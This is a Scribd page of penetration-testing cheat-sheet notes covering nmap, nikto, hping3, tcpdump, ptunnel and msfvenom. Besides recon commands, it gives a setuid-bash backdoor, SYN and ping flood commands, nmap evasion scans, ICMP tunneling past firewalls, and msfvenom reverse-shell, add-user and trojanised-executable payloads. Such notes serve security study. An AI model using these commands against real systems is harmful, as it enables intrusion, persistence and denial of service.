Scribd
Upload
23 views4 pages

EHPT Notes

The document provides a comprehensive guide on various Linux tools and commands for penetration testing, including installation commands, usage examples, and descriptions of functionalities. It covers tools like Nmap, Nikto, hping3, and Metasploit, detailing how to perform scans, create payloads, and utilize tunneling techniques. Additionally, it includes commands for monitoring network traffic and managing environmental variables.

Uploaded by

achiever8888
Copyright
© © All Rights Reserved
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as TXT, PDF, TXT or read online on Scribd
23 views4 pages

EHPT Notes

The document provides a comprehensive guide on various Linux tools and commands for penetration testing, including installation commands, usage examples, and descriptions of functionalities. It covers tools like Nmap, Nikto, hping3, and Metasploit, detailing how to perform scans, create payloads, and utilize tunneling techniques. Additionally, it includes commands for monitoring network traffic and managing environmental variables.

Uploaded by

achiever8888
Copyright
© © All Rights Reserved
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as TXT, PDF, TXT or read online on Scribd
You are on page 1/ 4

-----------------------------------------------------------------------------------

------------
General
-----------------------------------------------------------------------------------
------------
# apt install git wget curl make cpp default-jre htop pip firefox mousepad
libreoffice-calc gparted gnome-disk-utility snapd
- General Linux Tools

# apt install glogg ksystemlog


- Linux Log Viewing Tools

# apt install nmap netcat socat nikto iftop hping3 ptunnel gobuster sublist3r
tshark
- Linux EHPT Tools

# apt install seclist


- Install many Wordlists in /usr/share/seclists

# grep -Hnri [name] | vim -


- Will open the outpunt in VIM
- In VIM ":%!" will be used for advance commands like ":%!sort" will sort
the output etc
- ":%!grep -v [text]" will remove those lines starting with [text]

# ping -s 1000 [Target]


- Send large Ping Packet of 1000 size to test Firewall Capabilities

# ping -s 1000 -f [Target]


- Flood Ping with large Packet of 1000 Size to test Firewall Capabilities

# apt install iftop


- Install "iftop"

# iftop
- Will monitor network traffic & displays a table of current bandwidth
usage

# curl -i [Website-Target]
- Displays detail technical info about the [Website-Target]

# wget [Target]
- Will download the file from the [Target]

# nmap -T4 -sS -sT -sU -O -sV -sC -p- [Target]


- Scan SYN Stealth, Scan All TCP, All UDP, OS Detection, Version
Detection, Default Script, All Ports
- We can use -A against "-O, -sV & -sC

# nmap -D RND:10 [LAN-Target]


- Scan with Decoy using 10 Ramdom IP Addresses (in this example) to avoid
detection

# nmap -D [Decoy IP] [Target]


- Scan the [Target] with sepcified [Decoy IP]

# nmap -sA [Target]


- Ack Probe Scan. If "filtered" there is Active Firewall
# nmap --source-port 53 [Target]
- Scan [Target] with specific Source Port

# nmap -f [Target]
- Fragment the packet, making it harder to detect us while we scan

# nmap -sn [Target-Network]


- Scan live hosts inside [Target-Network]

# nmap -sL [Target-Network]


- Scan for host names on the network

# nmap --script malware [Target]


or
# nmap -sV --script=http-malware-host [Target]
- Scan for known Malware

# nmap --script=sniffer-detect [LAN-Target]


- Scan and detect if the Sniffer is active

# alias ls="a"
- Will create an alias "a" to command "ls"

# nikto -h [Website-Target]
- Scan [Website-Target] for basic vulnerability

# nikto -h [Website-Target] -ssl


- Scan [HTTPS Website-Target] for basic vulnerability

# nikto -h <IP or hostname> -Format msf+


- Scan [HTTPS Website-Target] for basic vulnerability & Pair Scans with
Metasploit

# gobuster dir [Website-Target] -w [Wordlist]


- Scan for Directories & Files on the [Website-Target] using a [Wordlist]
- Kali Wordlist Path = /usr/share/wordlists or /usr/share/seclists

# sublist3r -d [Website-Target]
- Enumerates & list out the subdomains of the [Website-Target]

# Searchsploit
- # git clone https://gitlab.com/exploit-database/exploitdb.git
/opt/exploitdb
- # ln -sf /opt/exploitdb/searchsploit /usr/local/bin/searchsploit
- # searchsploit ssh - Will search for SSH Exploits
- # searchsploit -u - Will update the database of searchsploit

$ sudo chmod +s /bin/bash


- Will create a backdoor with persistance mechanism by adding 'setuid' on
"/bin/bash"
- "bash -p" - Will directly give "root" access.

# tcpdump -i any icmp


- "tcpdump" will monitor ICMP trafic on any Network Port using "-i any"

# tcpdump -w [name.pcap] -i [interface]


- Will capture all trafic on the [interface] & will save in in
[name.pcap] file
# tcpdump -r [name.pcap]
- Will analyze the file [name.pcap]

# tcpdump -i [interface] -c 100


- Will capture only 100 packets

# tshark -V -c 1 -i [interface]
- Will capture only 1 packet, but with more details

# printenv
- Will print the current Environmental Variables

# ".bashrc"
- Bash Shell Startup File

# Global Variables
- Also called Environment Variables

# Local Variables
- Also called Shell Variables

-----------------------------------------------------------------------------------
------------
"hping3" to test Firewall Capabilities
-----------------------------------------------------------------------------------
------------
# apt install hping3
- Install "hping3"

# hping3 -S -V --flood [Target]


- Will flood the target with SYN Packets using "-S"

# hping3 --traceroute -V -1 [Target]


- Advance Traceroute with ICMP using "-1" option

# hping3 --traceroute -V -p 80 -S [Target]


- Advance Traceroute with SYN Packets using "-S" & to port 80 using "-p"

# hping3 --traceroute -V -p 80 -S -A [Target]


- Advance Traceroute with SYN Packets using "-S" & to port 80 using "-p"
& with the ACK Flag using "-A"

# hping3 --traceroute -V -p 80 -S -A --baseport 5555 [Target]


- Advance Traceroute with SYN Packets using "-S" & to port 80 using "-p"
& with the ACK Flag using "-A" & using local port "5555"

# hping3 --traceroute -V -p 53 --udp [Target]


- Advance Traceroute with SYN Packets using "-S" & to port 80 using "-p"

-----------------------------------------------------------------------------------
------------
Tunneling using "ptunnel" for Evading Firewall
-----------------------------------------------------------------------------------
------------
# apt install ptunnel
- Install "ptunnel"
# ptunnel
- Run on the [Target]

# ptunnel -p [Our-Address] -lp [Our-Local-Port] -da [Destination-Address] -dp


[Destination-Port]
- Run on attacker system. Use [Destination-Port] like SSH. This will
tunnel SSH trafic from inside ICMP
- Example : ptunnel -p 127.0.0.1 -lp 8888 -da 192.168.1.2 -dp 22
- # ssh -p 8888 user@192.168.1.2 - Will ssh to 192.168.1.2 from
inside ICMP Tunnel

-----------------------------------------------------------------------------------
------------
Penetration Testing & Metasploit
-----------------------------------------------------------------------------------
------------

# msfvenom -h
- Display Help

# msfvenom -l payloads #Payloads


- List Payloads

# msfvenom -l encoders #Encoders


- List Encoders

# msfvenom -p windows/meterpreter/reverse_tcp LHOST=[Local-Host-IP] LPORT=[Local-


Port] -f exe > name.exe
- Create basic Reverse TCP Payloal

# msfvenom -p windows/meterpreter/reverse_tcp LHOST=[Local-Host-IP] LPORT=[Local-


Port] -f exe -e x86/shikata_ga_nai -i 5 -b '\x00\xff' > name.exe
- Creates Reverse TCP Encoded Payload

# msfvenom -p windows/adduser USER=attacker PASS=attacker@123 -f exe > adduser.exe


- Create Windows USER

# msfvenom -p windows/shell/reverse_tcp [Local-Host-IP] LPORT=[Local-Port] -f exe >


prompt.exe
- Create Payload for CMD Shell

# msfvenom -p windows/shell_reverse_tcp [Local-Host-IP] LPORT=[Local-Port] -x


/usr/share/windows-binaries/existing.exe -f exe -o new.exe
- Embeded Payload instde Existing Executable

You might also like